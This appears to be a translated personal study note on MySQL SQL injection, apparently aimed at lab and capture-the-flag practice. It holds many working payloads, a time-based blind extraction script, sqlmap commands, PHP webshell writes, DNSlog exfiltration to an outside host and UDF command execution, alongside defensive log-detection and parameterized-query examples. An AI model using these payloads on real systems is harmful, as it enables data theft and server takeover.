SQL Injection
Reheating old leftovers here; the content below is already obsolete.
1. Introduction to SQL injection

Mainly based on Lazzaro's article.

Anecdote:
That scene of vigorous life, with everything competing to flourish, is still before my eyes.
Resetting a forgotten MySQL password (apparently needs a terminal run as administrator):

```shell
net stop MySQL80          # or stop the service in services.msc
mysqld --console --skip-grant-tables --shared-memory
mysql -uroot -p           # logs in without a password
```

```sql
use mysql;
update user set authentication_string='root' where user='root'; # change the password
# note: MySQL 8 stores a hash in authentication_string, so a plaintext value here will not log in;
# FLUSH PRIVILEGES; ALTER USER 'root'@'localhost' IDENTIFIED BY 'root'; sets it properly
exit
```

```shell
net start MySQL80
```

Running a query from the shell, and creating a new user with full privileges:

```shell
# query
mysql -u root -p123456 -e "use db1;select * from tb1;"
```

```sql
-- create a new user and grant privileges (the any-host wildcard is %, not *)
CREATE USER 'newuser'@'%' IDENTIFIED BY '123456';
GRANT ALL PRIVILEGES ON *.* TO 'newuser'@'%';
FLUSH PRIVILEGES;
```
Comments:

```sql
#   /**/   --   (there is a space after --)
```

Whitespace characters: 0x09, 0x0a-0x0d, 0x20, 0xa0

Newline: %0a

Inline (version-conditional) comment, which MySQL still executes:

```sql
/*! select **/ from tb1;
```
Injection point types: numeric, string.
Injection point locations: GET, POST, Cookie, search fields, HTTP headers.
Injection techniques: union-based, error-based, boolean blind, time-based blind, and others.
- information_schema.schemata: stores the names of all databases on the MySQL server (schema_name).
- information_schema.tables: stores the names of all tables; the key columns are table_schema (database name) and table_name (table name).
- information_schema.columns: stores the names of all columns; the key columns are table_schema (database name), table_name (table name) and column_name (column name).
Alternatives to information_schema for enumerating database and table names:

information_schema.TABLESPACES_EXTENSIONS: MySQL > 8.0.21, yields database and table names.

InnoDB engine and MySQL >= 5.5.8: database and table names from the InnoDB statistics tables.

```sql
select group_concat(database_name) from mysql.innodb_index_stats;
select group_concat(table_name) from mysql.innodb_table_stats where database_name=database();
```

MySQL >= 5.7: sys.schema_auto_increment_columns. This view holds the databases and tables that have an auto-increment column; most table designs include one (such as id).

```sql
# database names
select table_schema from sys.schema_auto_increment_columns;
# table names
select table_name from sys.schema_auto_increment_columns where table_schema=database();
```

When there is no auto-increment column, use schema_table_statistics_with_buffer instead:

```sql
# databases
select table_schema from sys.schema_table_statistics_with_buffer;
select table_schema from sys.x$schema_table_statistics_with_buffer;
# tables of a given database
select table_name from sys.schema_table_statistics_with_buffer where table_schema=database();
select table_name from sys.x$schema_table_statistics_with_buffer where table_schema=database();
```
General procedure:

```sql
select table_name from information_schema.tables where table_schema=database(); # or schema()
select column_name from information_schema.columns where table_schema=database() and table_name='t_user';
select * from test1.t_user;
```
Universal passwords:

```
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
1'^1#   (false injection)
```
2. Time-based injection script template

Boolean blind injection

Use case: the page content returned for true and false conditions is easy to tell apart, so a Python script can match the two kinds of response to decide whether a condition holds.

```sql
select * from users where username='nouser' or length(database())>8
```

Time-based injection

Relies on the delay of the page's response to decide whether a condition is true.

Functions that commonly produce a usable delay are sleep() and benchmark(); many computationally expensive functions can also serve as the delay criterion, as can Cartesian products of tables or GET_LOCK across two sessions.
```python
import time
import requests


def my_get(url):
    """Return the elapsed time of a GET request."""
    start_time = time.time()
    requests.get(url)  # GET request
    end_time = time.time()
    return end_time - start_time


def binary_search(url, pos):
    """Binary-search the ASCII code of character `pos` of the table name.
    Returns the character, or '' when no code in the range matched (timing jitter)."""
    left = 32
    right = 126  # printable character range 32-126
    # ?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))=117,sleep(1),1)--+
    query = "(select table_name from information_schema.tables where table_schema=database() limit 3,1)"
    while left <= right:
        mid = (left + right) // 2
        t1 = my_get(url + f"?id=1' and if(ascii(substr({query},{pos},1))>={mid},sleep(1),1) --+")
        if t1 > 1:
            t2 = my_get(url + f"?id=1' and if(ascii(substr({query},{pos},1))={mid},sleep(1),1) --+")
            if t2 > 1:
                print(chr(mid))
                return chr(mid)
            left = mid + 1
        else:
            right = mid - 1
    return ''


if __name__ == '__main__':
    result = ''
    url = 'http://192.168.10.3:9545/Less-9/'
    # outer loop walks the character positions, inner loop binary-searches the ASCII code
    for i in range(1, 6):
        ch = ''
        while ch == '':  # a failed search is simply retried
            ch = binary_search(url, i)
        result += ch
    print(result)
```
Time-based injection with sqlmap

```shell
# database name
python sqlmap.py -u "http://192.168.10.3:9545/Less-9/?id=1" --technique=T --current-db
# table names
python sqlmap.py -u "http://192.168.10.3:9545/Less-9/?id=1" --technique=T -D security --tables
# column names
python sqlmap.py -u "http://192.168.10.3:9545/Less-9/?id=1" --technique=T -D security -T users --columns
# records
python sqlmap.py -u "http://192.168.10.3:9545/Less-9/?id=1" --technique=T -D security -T users -C id,username,password --dump
```
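The probes the script above and sqlmap's --technique=T send leave a recognisable trail in web server logs. The following is an added example, not part of the original post: it parses constructed nginx-style access log lines (assumed to carry $request_time as the final field) and flags requests that name the delay primitives listed above (sleep(), benchmark(), GET_LOCK()) or that take abnormally long while carrying SQL syntax, which also catches the Cartesian-product style delays. The log lines, the log format and the SLOW_SECONDS threshold are assumptions.

```python
"""Added example (not from the original post): spotting time-based injection probes in web logs.
Assumes an nginx-style access log with $request_time as the final field; lines are constructed."""
import re
from urllib.parse import unquote_plus

# Constructed log lines: a normal request, the script's binary-search probe, a sqlmap
# --technique=T probe, a Cartesian-product delay with no sleep() call, and another normal request.
SAMPLE_LOG = """\
192.168.10.5 - - [01/May/2024:10:00:01 +0800] "GET /Less-9/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 0.012
192.168.10.5 - - [01/May/2024:10:00:02 +0800] "GET /Less-9/?id=1%27%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%203,1),1,1))%3E=79,sleep(1),1)%20--+ HTTP/1.1" 200 512 "-" "python-requests/2.31" 1.018
192.168.10.5 - - [01/May/2024:10:00:03 +0800] "GET /Less-9/?id=1%27%20AND%20SLEEP(5)%20AND%20%27a%27=%27a HTTP/1.1" 200 512 "-" "sqlmap/1.8" 5.021
192.168.10.5 - - [01/May/2024:10:00:04 +0800] "GET /Less-9/?id=1%27%20and%20(select%20count(*)%20from%20information_schema.columns%20a,information_schema.columns%20b)%3E0--+ HTTP/1.1" 200 512 "-" "python-requests/2.31" 4.400
192.168.10.7 - - [01/May/2024:10:00:05 +0800] "GET /Less-9/?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0" 0.011
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+ "[^"]*" "(?P<ua>[^"]*)" (?P<rt>[\d.]+)$')
# The delay primitives named in the text above.
DELAY_FUNCS = re.compile(r'\b(sleep|benchmark|get_lock)\s*\(', re.IGNORECASE)
SLOW_SECONDS = 1.0  # assumed threshold; normal requests to this path take about 10 ms


def parse_line(line):
    """Return a dict with the fields we need, or None if the line does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["rt"] = float(rec["rt"])
    rec["decoded"] = unquote_plus(rec["target"])  # undo %27, %20 and the trailing --+
    return rec


def classify(rec):
    """Return the reasons a request looks like a time-based probe (empty list if none)."""
    reasons = []
    decoded = rec["decoded"]
    if DELAY_FUNCS.search(decoded):
        reasons.append("delay-function")
    # Heavy-computation and Cartesian-product delays name no sleep(); catch them by latency
    # combined with SQL syntax in the parameter.
    if rec["rt"] >= SLOW_SECONDS and ("'" in decoded or "select" in decoded.lower()):
        reasons.append("slow-with-sql-syntax")
    return reasons


def scan(log_text):
    """Return (ip, decoded request target, reasons) for every flagged line."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and (reasons := classify(rec)):
            findings.append((rec["ip"], rec["decoded"], reasons))
    return findings


if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE_LOG):
        print(ip, reasons, target[:80])
```

The latency rule only works against a baseline for the same path, so in practice SLOW_SECONDS should be derived from that path's normal response times rather than fixed.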
3. Error-based injection

By deliberately misusing certain functions, their argument is echoed in the page's error output.

Prerequisite: the server returns error details, i.e. an error message is sent back when a query fails.

Commonly exploited functions: exp(), group by + floor() + rand(), updatexml(), extractvalue(), and others.

```sql
(where|and|or) exp(~(select * from(select user())a));
(where|and|or) pow(~(select * from(select user())a),9999);
(where|and|or) updatexml(1,concat(0x7e,(select user()),0x7e),1);
(where|and|or) extractvalue(1,concat(0x7e,(select user()),0x7e));
(where|and|or) (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)));
(where|and|or) (select count(*) from information_schema.tables group by concat((select user()),0x7e,ceil(rand(0)*2)));
```

When exp() is passed a value greater than 709, the function overflows and raises an error.

updatexml() takes the XML target, the XPath expression and the replacement value; the second parameter must not contain special characters, and the resulting error echoes it.

extractvalue() takes the field holding the XML data and the XPath expression; again the second parameter must not contain special characters.

Why group by + floor() + rand() raises a duplicate primary key error:

MySQL first creates a virtual (temporary) table, then starts reading rows from the real table and checks whether the same key already exists in the virtual table; if not, it creates the key, otherwise it increments that key's count(*). During the group by, rand(0) is evaluated once for the lookup and the key is not found; when the row is then inserted into the virtual table, rand(0) is evaluated a second time, changing the key being inserted, so the inserted primary key collides with one that already exists and an error is raised.
4. Second-order injection

Injection that occurs when malicious data constructed by the attacker is stored in the database and later read back into a SQL statement.

Most web applications nowadays filter parameters to prevent injection. If urldecode() or rawurldecode() is used somewhere, the parameter is decoded a second time, which can produce a single quote and trigger injection; this too is second-order injection.

Web applications usually use addslashes(), mysql_real_escape_string() or mysql_escape_string(), or enable GPC (magic quotes), to prevent injection: single quotes ('), double quotes ("), backslashes (\) and NUL are prefixed with a backslash.

Although addslashes adds a "\" during filtering, the "\" is not carried into the database.

For example, register with the username admin'#. When the password is later changed, the stored single quote closes the quote before it:

```php
$sql = "UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass'";
```

Everything after # is commented out, so admin's password ends up being changed.
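To make the admin'# scenario above concrete, here is an added example (not code from the original post) that replays it with Python's sqlite3 so it runs offline; because sqlite only treats -- as a line comment, the stored username is admin'-- rather than MySQL's admin'#. It contrasts the string-built UPDATE with a fully parameterized one; the table, accounts and passwords are constructed.

```python
"""Added example (not from the original post): second-order injection replayed with sqlite3.
The stored username is admin'-- because sqlite only knows -- line comments; MySQL would use admin'#."""
import sqlite3

ATTACKER_USERNAME = "admin'--"   # constructed: chosen by the attacker at registration time


def setup_db():
    """Constructed sample data: a real admin account plus the attacker's account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", "admin-secret"))
    # Registration is parameterized, so the quote is stored literally; nothing happens yet.
    conn.execute("INSERT INTO users VALUES (?, ?)", (ATTACKER_USERNAME, "attacker-pw"))
    conn.commit()
    return conn


def change_password_vulnerable(conn, username, curr_pass, new_pass):
    """Reads the stored username back and splices it into the UPDATE as a string.
    The trusted-looking database value is the second-order payload."""
    stored_name = conn.execute(
        "SELECT username FROM users WHERE username = ?", (username,)).fetchone()[0]
    sql = (f"UPDATE users SET password='{new_pass}' "
           f"WHERE username='{stored_name}' AND password='{curr_pass}'")
    # With admin'-- this becomes: ... WHERE username='admin'--' AND password='...'
    conn.execute(sql)
    conn.commit()
    return sql


def change_password_safe(conn, username, curr_pass, new_pass):
    """Binds every value, including data read back from the database. Returns rows updated."""
    stored_name = conn.execute(
        "SELECT username FROM users WHERE username = ?", (username,)).fetchone()[0]
    cur = conn.execute(
        "UPDATE users SET password=? WHERE username=? AND password=?",
        (new_pass, stored_name, curr_pass))
    conn.commit()
    return cur.rowcount


def admin_password(conn):
    return conn.execute(
        "SELECT password FROM users WHERE username='admin'").fetchone()[0]


def demo():
    """Return admin's password after the vulnerable and after the safe password change,
    both attempted by the attacker with a wrong current password."""
    vuln = setup_db()
    change_password_vulnerable(vuln, ATTACKER_USERNAME, "wrong-pw", "pwned")
    safe = setup_db()
    change_password_safe(safe, ATTACKER_USERNAME, "wrong-pw", "pwned")
    return admin_password(vuln), admin_password(safe)


if __name__ == "__main__":
    print(demo())
```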
5. Wide-byte injection

Wide-byte injection refers to this: when the MySQL database uses a wide-byte (GBK) encoding, it treats two bytes as one Chinese character (the first byte must be above 128, e.g. %df, to fall into the Chinese range). When we send a single quote, the escaping function turns it into \', and the hex of \ is %5c; under GBK, MySQL treats %df%5c as a single wide character, namely 運, so the single quote is left unescaped (it escapes the filter), closes the string, and injection follows.

For example:

```php
<?php
header("Content-Type:text/html;charset=gbk");
$servername = "localhost";
$username = "root";
$password = "123456";
$dbname = "db1";
$conn = new mysqli($servername, $username, $password, $dbname);
$conn->set_charset("gbk");
// check whether the connection succeeded
if ($conn->connect_error) {
    // on failure, print the error and stop
    die("Connection failed: \n" . $conn->connect_error);
}
$conn->query("set names gbk");
if (isset($_GET['id'])) {
    echo $_GET['id'];
    $id = addslashes($_GET['id']);
    $sql = "select * from tb1 where id1='$id' limit 0,1";
    echo $sql;
    $result = $conn->query($sql);
    var_dump($result);
    var_dump($result->fetch_assoc());
}
```

```
1%df' union select 1,database(),3 --+
```
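The following added example (not from the original post) reproduces in Python what the PHP above does to the bytes: a byte-level addslashes() inserts 0x5c, and a GBK-decoding server then folds %df%5c into one character, leaving the quote unescaped. It also shows the hardened order of operations, decoding the input strictly in the connection charset first and escaping the decoded text; the query template and the inputs are assumptions.

```python
"""Added example: why byte-level addslashes() fails under GBK, and the charset-aware fix.
Constructed query template mirroring the PHP above; not the original post's code."""

PREFIX = b"select * from tb1 where id1='"
SUFFIX = b"' limit 0,1"
ESCAPED_BYTES = (0x27, 0x22, 0x5C, 0x00)          # ' " \ NUL, as in PHP addslashes()
ESCAPED_CHARS = ("'", '"', "\\", "\x00")


def addslashes(data: bytes) -> bytes:
    """Byte-level escaping like PHP addslashes(): blind to multi-byte characters."""
    out = bytearray()
    for b in data:
        if b in ESCAPED_BYTES:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def escape_after_decoding(raw: bytes, charset: str = "gbk") -> bytes:
    """Hardened order: decode strictly in the connection charset (a lone 0xdf before ' is
    rejected with UnicodeDecodeError), escape the characters, then re-encode."""
    text = raw.decode(charset)
    escaped = "".join("\\" + ch if ch in ESCAPED_CHARS else ch for ch in text)
    return escaped.encode(charset)


def build_query(escaped_id: bytes) -> bytes:
    return PREFIX + escaped_id + SUFFIX


def literal_seen_by_server(query: bytes, charset: str = "gbk") -> str:
    """Decode the whole statement the way a GBK connection does and cut out the id literal.
    PREFIX and SUFFIX are ASCII, so their byte lengths equal their character lengths."""
    text = query.decode(charset, errors="replace")
    return text[len(PREFIX):len(text) - len(SUFFIX)]


def quote_is_escaped(literal: str) -> bool:
    """True when every ' inside the literal is still preceded by a backslash."""
    return all(i > 0 and literal[i - 1] == "\\"
               for i, ch in enumerate(literal) if ch == "'")


def vulnerable_literal(raw: bytes) -> str:
    """What the server sees when the PHP above runs addslashes() on the raw bytes."""
    return literal_seen_by_server(build_query(addslashes(raw)))


def hardened_literal(raw: bytes) -> str:
    """What the server sees with charset-aware escaping (raises on invalid input)."""
    return literal_seen_by_server(build_query(escape_after_decoding(raw)))


if __name__ == "__main__":
    print(repr(vulnerable_literal(b"1' or 1=1")))   # backslash survives, quote stays escaped
    print(repr(vulnerable_literal(b"1\xdf'")))      # backslash swallowed into a CJK character
```

Prepared statements, or mysqli_real_escape_string() after mysqli_set_charset(), achieve the same charset-aware result in PHP.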
6. Stacked injection

Once the original statement is complete, append a semicolon to mark its end; whatever follows is a brand-new SQL statement, at which point insert, delete, select and update are completely unrestricted.

Fairly rare, as it depends on the API or database engine; for example, mysqli_multi_query() is needed to run several statements in one call.

```
?id=-1';select 1,2,(show databases);-- +
```
7. Reading and writing files via SQL injection

secure_file_priv:

- NULL: import and export are not allowed
- /tmp: import and export only within the /tmp directory
- empty: no directory restriction

```sql
# show variables like "secure%";
# append secure_file_priv="" at the end of my.ini, then restart the MySQL service
# read a file
-1 union select 1,2,3,load_file("/etc/passwd"),5,6
# write a file
-1 union select 1,2,3,4,5,"<?php phpinfo(); ?>" into outfile "D:\\xamppnew\\htdocs\\security\\muma.php"
-1 union select 1,2,3,4,5,"<?php @eval($_POST['a']); ?>" into outfile "D:/xamppnew/htdocs/security/muma.php"
/*
select hex(666) into outfile "C:\\ProgramData\\MySQL\\MySQL Server 8.0\\Uploads\\3.txt";
*/
```

Converting the BLOB data returned by load_file into char data:

```sql
select convert(load_file("C:\\ProgramData\\MySQL\\MySQL Server 8.0\\Uploads\\1.txt"),char(255));
select cast(load_file("C:\\ProgramData\\MySQL\\MySQL Server 8.0\\Uploads\\1.txt") as char(255));
```

DNSlog out-of-band exfiltration; my attempt failed (the dnslog site is gone).

UNC path format: \\server\sharename\directory\filename

```
?id=1' and load_file(concat('\\\\',hex(user()),'.ui9a1m.dnslog.cn/abc'))--+
```
8. Injection without column names

1. Brute-forcing column names with join + using

join merges two tables; using specifies which column(s) to join on. When a column exists on both sides but is not listed in using, MySQL raises a duplicate column name error that reveals it.

```sql
select * from tb1 as b join tb1 as c using(`id1`);
use db1;
select * from tb1 where id1='1' union all select * from (select * from tb1 as a join tb1 as b )as c;
select * from tb1 where id1='1' union all select * from (select * from tb1 as a join tb1 as b using(id1))as c;
select * from tb1 where id1='1' union all select * from (select * from tb1 as a join tb1 as b using(id1,name))as c;
select * from tb1 where id1='1' union all select * from (select * from tb1 as a join tb1 as b using(id1,name,price))as c;
```

2. Building column references with a subquery

```sql
select 1,2,3 union select * from tb1;
# select the second column's data (note the backticks)
select `2` from (select 1,2,3 union select * from tb1)a;
select a.2 from (select 1,2,3 union select * from tb1)a;
select * from tb1 where id1='-1' union select 1,2,group_concat(`3`) from (select 1,2,3 union select * from tb1)x;
```

3. Comparing values with order by

```sql
use user;
select * from t_user where id='10' union select 1,2,'o' order by 3;
select * from t_user where id='10' union select 1,2,'p' order by 3;
select * from t_user where id='10' union select 1,2,'q' order by 3;
```
9. Quine injection

A quine is a self-reproducing program. In SQL injection it is a technique that makes the SQL string given as input identical to the string the query outputs; it is commonly used in certain login-bypass injections.

replace(object, search, replace) replaces every occurrence of search in object with replace.

ASCII codes used: 34 is ", 39 is ', 46 is .

char(34) and char(39) can equally be written as chr(34), chr(39) or 0x22, 0x27.

The basic form of the quine is replace(str, encoded separator, str), where str has the form REPLACE(separator, encoded separator, separator):

```sql
select REPLACE('.',CHAR(46),'.');
select REPLACE('REPLACE(".",CHAR(46),".")',CHAR(46),'REPLACE(".",CHAR(46),".")');
```

You will notice there is still a subtle difference between single and double quotes, so str is changed to the form below, which also replaces double quotes with single quotes:

REPLACE(REPLACE("separator",CHAR(34),CHAR(39)),encoded separator,"separator")

```sql
select replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")');
```

Applied to a query such as $sql="select price from tb1 where price='$price'", the payload and the resulting query are:

```sql
# payload:
# 1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#
select price from tb1 where price='1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#'
# the row returned by the union is the payload itself:
# 1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#
```
10. Common bypasses

select

- Use the table statement: on MySQL > 8.0.19, table tb1 can replace select * from tb1; table has no where clause.
- Use the handler statement instead of a select query:

```sql
use user;
/* read the users table through handler statements */
handler t_user open as yunensec; /* open the table and give the returned handle an alias */
handler yunensec read first;     /* read the first row of the table/handle */
handler yunensec read next;      /* read the next row */
handler yunensec read next;      /* read the next row */
handler yunensec close;          /* close the handle */
```

Whitespace

- Nest multiple layers of parentheses
- Use + instead
- Use comments instead, e.g. /**/ or the MySQL-specific /*! */
- and/or may be followed by an odd or even number of ! or ~ characters in place of the space, mixed freely (which parity works depends on the environment); the space before and/or can be omitted
- Invisible characters such as %09, %0a, %0b, %0c, %0d and %a0 can also stand in for a space

Single and double quotes

- When the quote must be broken out of: test whether an encoding issue produces SQL injection.
- When it need not be: strings can be written in hex, or expressed in another base via conversion functions.

```sql
-- hex encoding
SELECT * FROM Users WHERE username = 0x61646D696E
-- char() function
SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)
```

Comma

- Use the form substr((database())from({})for(1))
- Use join:

```sql
union select * from ((select 1)a join (select 2)b join (select 3)c);
```

Equals sign

- Use like, regexp, in or <>

and/or

- Double writing: anandd, oorr
- Operator substitution: &&, ||
- Append = directly, e.g. ?id=1=(condition); this seems to rely on PHP behaviour
- Other methods, e.g. ?id=1^(condition) or ?id=1)xor(condition)

union

- Fall back to blind injection:

```sql
select * from t_user where id=1 || (select count(*) from t_user)>0;
```

limit

```sql
'and(select pass from users where id=1)='a
'and(select pass from users group by id having id=1)='a
'and length((select pass from users having substr(pass,1,1)='a'))
```

where

- Use join, if, case when, order by or group by instead

Other keywords

- Case variation
- Double writing
- With CONCAT(), if any argument is NULL the result is NULL, so CONCAT_WS() is recommended; its first argument is the separator placed between the concatenated values.

```sql
SELECT 'a' 'd' 'mi' 'n';
SELECT CONCAT('a', 'd', 'm', 'i', 'n');
SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');
SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n');
```
11. Common MySQL privilege escalation

1. UDF privilege escalation

UDF stands for User Defined Function. MySQL provides it so users can define their own functions for convenient querying of complex data, but it can also be abused by an attacker to escalate privileges.

Principle: the attacker writes a shared library that can call cmd or a shell (.dll on Windows, .so on Linux), places it in a specific directory, and creates a user-defined function from that library inside the database. The function does whatever the library does, so calling it from SQL runs system commands (just as version() returns the database version, the custom function executes a system command).

- In sqlmap, find the directory that contains the following files.
- Find cloak.py, which decodes the dynamic libraries shipped with sqlmap. (This did not seem to work.)

```shell
# decode the 32-bit Linux shared library
python cloak.py -d -i ../../data/udf/mysql/linux/32/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_32.so
# decode the 64-bit Linux shared library
python cloak.py -d -i ../../data/udf/mysql/linux/64/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so
# decode the 32-bit Windows DLL
python cloak.py -d -i ../../data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll
# decode the 64-bit Windows DLL
python cloak.py -d -i ../../data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll
```

- Find MySQL's plugin directory:

```sql
show variables like '%plugin%';
```

- Write the shared library

This needs a high-privilege SQL injection, a writable plugin directory and an unrestricted secure_file_priv. When the MySQL plugin directory is writable by the MySQL user, sqlmap can upload the shared library directly; because GET has a length limit, the attack is usually only feasible through POST injection.

Payload lookup site

You may first need to change the permissions of "C:\Program Files\MySQL\MySQL Server 8.0\lib\plugin" to full control.

```sql
show variables like '%version_%'; # check whether the platform is 64-bit or 32-bit
```
For 64-bit Windows, the following statement is used: SELECT 0x... INTO DUMPFILE 'C:\\Program Files\\MySQL\\MySQL Server 8.0\\lib\\plugin\\udf.dll', where the hex literal is the entire lib_mysqludf_sys.dll (the multi-kilobyte hex blob is omitted here).
- Create the user-defined function

```sql
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
# check whether sys_eval now appears among the MySQL functions:
select * from mysql.func;
select sys_eval('whoami'); # nt authority\network service
# drop the user-defined function
drop function sys_eval;
```
Maybe I should reproduce the 2024 Yangcheng Cup challenges?